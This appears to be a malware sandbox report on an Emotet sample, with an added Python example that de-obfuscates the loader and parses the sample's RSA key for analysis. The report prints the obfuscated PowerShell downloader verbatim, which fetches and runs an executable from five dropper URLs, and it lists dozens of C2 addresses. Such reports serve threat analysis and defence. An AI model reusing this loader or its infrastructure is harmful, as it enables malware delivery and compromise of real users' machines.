3bd57e5d19f2bad873360a00d5fb1f848945f1fbcdcdc1bea3d94c0edc4a0998

General
Target

3bd57e5d19f2bad873360a00d5fb1f848945f1fbcdcdc1bea3d94c0edc4a0998

Filesize

N/A

Completed

14-01-2020 23:25

Score
10 /10
SHA256

3bd57e5d19f2bad873360a00d5fb1f848945f1fbcdcdc1bea3d94c0edc4a0998

Malware Config

Extracted

Language ps1
Source $Wzrmalxuxq='Qlfchbtowq';$Quonirlij = '200';$Aoligwsevre='Ucdpooeixccoe';$Ebiendllvobj=$env:userprofile+'\'+$Quonirlij+'.exe';$Pmfunxawmmq='Ivubiigrkhbq';$Dfrtqyjmv=.('new'+'-objec'+'t') NET.WeBCLiENt;$Rupvmuvyjos='http://farsmix.com/wp-admin/xpk881/*http://thuong.bidiworks.com/wp-content/q2TO1988/*https://securiteordi.com/wofk253jeksed/QO485/*http://ziyinshedege.com/wp-content/TIGc/*http://luilao.com/yakattack/EmXdYs3Rf/'."sPl`it"('*');$Dmiucocoi='Gaufrcyulz';foreach($Qgckujoct in $Rupvmuvyjos){try{$Dfrtqyjmv."doWnLo`AD`FILe"($Qgckujoct, $Ebiendllvobj);$Bfvbxeeee='Xkdsngqtnjr';If ((&('Get-I'+'tem') $Ebiendllvobj)."lENG`Th" -ge 21347) {[Diagnostics.Process]::"St`Art"($Ebiendllvobj);$Mtfdvohceh='Mejegftkx';break;$Kkougnyjdop='Zbiyjufvdg'}}catch{}}$Jiclhxoqfv='Uaofyltws'
URLs
exe.dropper

http://farsmix.com/wp-admin/xpk881/

exe.dropper

http://thuong.bidiworks.com/wp-content/q2TO1988/

exe.dropper

https://securiteordi.com/wofk253jeksed/QO485/

exe.dropper

http://ziyinshedege.com/wp-content/TIGc/

exe.dropper

http://luilao.com/yakattack/EmXdYs3Rf/

Extracted

Family emotet
C2

70.184.69.146:80

186.177.165.196:443

139.47.135.215:80

192.241.143.52:8080

159.65.241.220:8080

45.79.95.107:443

69.163.33.84:8080

177.34.142.163:80

200.123.183.137:443

2.47.112.72:80

190.17.44.48:80

187.54.225.76:80

190.219.149.236:80

190.100.153.162:443

58.171.38.26:80

91.205.215.57:7080

152.231.89.226:80

94.176.234.118:443

201.213.100.141:8080

203.25.159.3:8080

110.142.161.90:443

46.101.212.195:8080

178.79.163.131:8080

151.80.142.33:80

79.7.158.208:80

191.183.21.190:80

188.216.24.204:80

113.190.254.245:80

87.106.46.107:8080

120.150.247.164:80

80.11.158.65:8080

203.130.0.69:80

50.28.51.143:8080

129.205.201.163:80

149.62.173.247:8080

177.242.21.126:80

200.45.187.90:80

77.55.211.77:8080

190.210.236.139:80

202.62.39.111:80

138.68.106.4:7080

2.45.112.134:80

83.165.78.227:80

76.69.26.71:80

207.154.204.40:8080

212.71.237.140:8080

58.162.218.151:80

189.201.197.98:8080

68.187.160.28:443

190.151.5.130:443

rsa_pubkey.plain
-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
-----END PUBLIC KEY-----
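The following is an added example, not part of the sandbox report and not code from the sample. It works through the two extracted artifacts above with the Python standard library only: it undoes the cheap obfuscation in the ps1 downloader (backticks inside quoted member names, 'a'+'b' literal splitting, cmdlets invoked via .('...') and &('...')) and pulls out the payload URL list, the drop path, the minimum-size sanity check and the launch step; then it parses the rsa_pubkey.plain PEM by hand to report the modulus size and exponent. Both inputs are copied verbatim from this report; the function names (normalize, extract_config, rsa_pubkey_info) are this example's own.

```python
import base64
import re

# The obfuscated downloader exactly as the sandbox extracted it (copied from this report).
DOWNLOADER = r"""$Wzrmalxuxq='Qlfchbtowq';$Quonirlij = '200';$Aoligwsevre='Ucdpooeixccoe';$Ebiendllvobj=$env:userprofile+'\'+$Quonirlij+'.exe';$Pmfunxawmmq='Ivubiigrkhbq';$Dfrtqyjmv=.('new'+'-objec'+'t') NET.WeBCLiENt;$Rupvmuvyjos='http://farsmix.com/wp-admin/xpk881/*http://thuong.bidiworks.com/wp-content/q2TO1988/*https://securiteordi.com/wofk253jeksed/QO485/*http://ziyinshedege.com/wp-content/TIGc/*http://luilao.com/yakattack/EmXdYs3Rf/'."sPl`it"('*');$Dmiucocoi='Gaufrcyulz';foreach($Qgckujoct in $Rupvmuvyjos){try{$Dfrtqyjmv."doWnLo`AD`FILe"($Qgckujoct, $Ebiendllvobj);$Bfvbxeeee='Xkdsngqtnjr';If ((&('Get-I'+'tem') $Ebiendllvobj)."lENG`Th" -ge 21347) {[Diagnostics.Process]::"St`Art"($Ebiendllvobj);$Mtfdvohceh='Mejegftkx';break;$Kkougnyjdop='Zbiyjufvdg'}}catch{}}$Jiclhxoqfv='Uaofyltws'"""

# The RSA public key from the extracted emotet config (copied from this report).
RSA_PEM = """-----BEGIN PUBLIC KEY-----
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOmlscqbEIhLjVsj9r3eYacKi6C+Qrua
j5TlU+pn3zc0k06qCoahFXBBGnYMotHQc6OwfBKwHWm831LIVg29kEjT8UYxnN5v
fzNGgqXTe25QARf78CsQqqN/ImKdXo+GFwIDAQAB
-----END PUBLIC KEY-----"""

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize(script):
    """Undo the obfuscation tricks this loader uses so plain regexes can read it."""
    s = script.replace("`", "")           # "doWnLo`AD`FILe" -> "doWnLoADFILe" (no other escapes here)
    prev = None
    while prev != s:                      # fold 'new'+'-objec'+'t' -> 'new-object', repeat to fixpoint
        prev, s = s, _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
    s = re.sub(r"[.&]\('([^']*)'\)", r"\1", s)   # .('new-object') / &('Get-Item') -> bare cmdlet
    s = re.sub(r'\."([A-Za-z]+)"', r".\1", s)     # ."sPlit"( -> .sPlit(
    s = re.sub(r'::"([A-Za-z]+)"', r"::\1", s)    # ::"StArt"( -> ::StArt(
    return s


def extract_config(script):
    """Recover the indicators a responder wants from the normalised downloader."""
    n = normalize(script)
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", n))   # $Var='literal' assignments
    cfg = {"urls": [], "drop_path": None, "min_size": None, "client": None, "executes": False}
    m = re.search(r"'([^']*)'\.split\('\*'\)", n, re.I)          # '*'-separated URL list
    if m:
        cfg["urls"] = [u for u in m.group(1).split("*") if u]
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'(\.\w+)'", n, re.I)
    if m:                                 # $env:userprofile+'\'+$Var+'.exe' -> %USERPROFILE%\<Var>.exe
        cfg["drop_path"] = "%USERPROFILE%\\" + literals.get(m.group(1), "?") + m.group(2)
    m = re.search(r"\.length\s+-ge\s+(\d+)", n, re.I)             # "is the download big enough" check
    if m:
        cfg["min_size"] = int(m.group(1))
    m = re.search(r"new-object\s+([\w.]+)", n, re.I)               # download primitive
    if m:
        cfg["client"] = m.group(1)
    cfg["executes"] = re.search(r"\[Diagnostics\.Process\]::start\(", n, re.I) is not None
    return cfg


def _tlv(buf, off):
    """Read one DER tag-length-value at buf[off:], returning (tag, value, next_offset)."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                     # long form: low 7 bits give the number of length bytes
        nbytes = length & 0x7F
        length, off = int.from_bytes(buf[off:off + nbytes], "big"), off + nbytes
    return tag, buf[off:off + length], off + length


def rsa_pubkey_info(pem):
    """Parse a SubjectPublicKeyInfo PEM (single-line or wrapped) and report modulus bits and e."""
    body = re.sub(r"-----[A-Z ]+-----", "", pem)
    der = base64.b64decode("".join(body.split()))
    tag, spki, _ = _tlv(der, 0)
    if tag != 0x30:
        raise ValueError("expected SEQUENCE")
    _, _alg, off = _tlv(spki, 0)          # AlgorithmIdentifier (rsaEncryption), not needed
    tag, bitstr, _ = _tlv(spki, off)
    if tag != 0x03 or bitstr[0] != 0:
        raise ValueError("expected BIT STRING with no unused bits")
    _, rsa, _ = _tlv(bitstr[1:], 0)       # RSAPublicKey ::= SEQUENCE { n INTEGER, e INTEGER }
    _, n_bytes, off = _tlv(rsa, 0)
    _, e_bytes, _ = _tlv(rsa, off)
    n = int.from_bytes(n_bytes, "big")
    return {"bits": n.bit_length(), "exponent": int.from_bytes(e_bytes, "big")}


if __name__ == "__main__":
    cfg = extract_config(DOWNLOADER)
    print("\n".join(cfg["urls"]))
    print(cfg["drop_path"], cfg["min_size"], cfg["client"], cfg["executes"])
    print(rsa_pubkey_info(RSA_PEM))
```

Run against the report's own data, the five exe.dropper URLs come back in the order the loader tries them, the drop path resolves to %USERPROFILE%\200.exe (which is the C:\Users\Admin\200.exe in the Downloads list, the sandbox user being Admin), and the 21347-byte threshold is the loader's guard against a web server that answers with a short error page instead of the payload. The key parser reports a 768-bit modulus with e=65537; key size is a quick way to tell which Emotet key epoch a config belongs to when correlating samples.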
Signatures

    Downloads
    • C:\Users\Admin\200.exe

    • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438

    • memory/4484-9-0x0000000000620000-0x0000000000637000-memory.dmp

    • memory/4484-10-0x0000000000400000-0x000000000046E000-memory.dmp

    • memory/4528-6-0x00000000021E0000-0x00000000021F7000-memory.dmp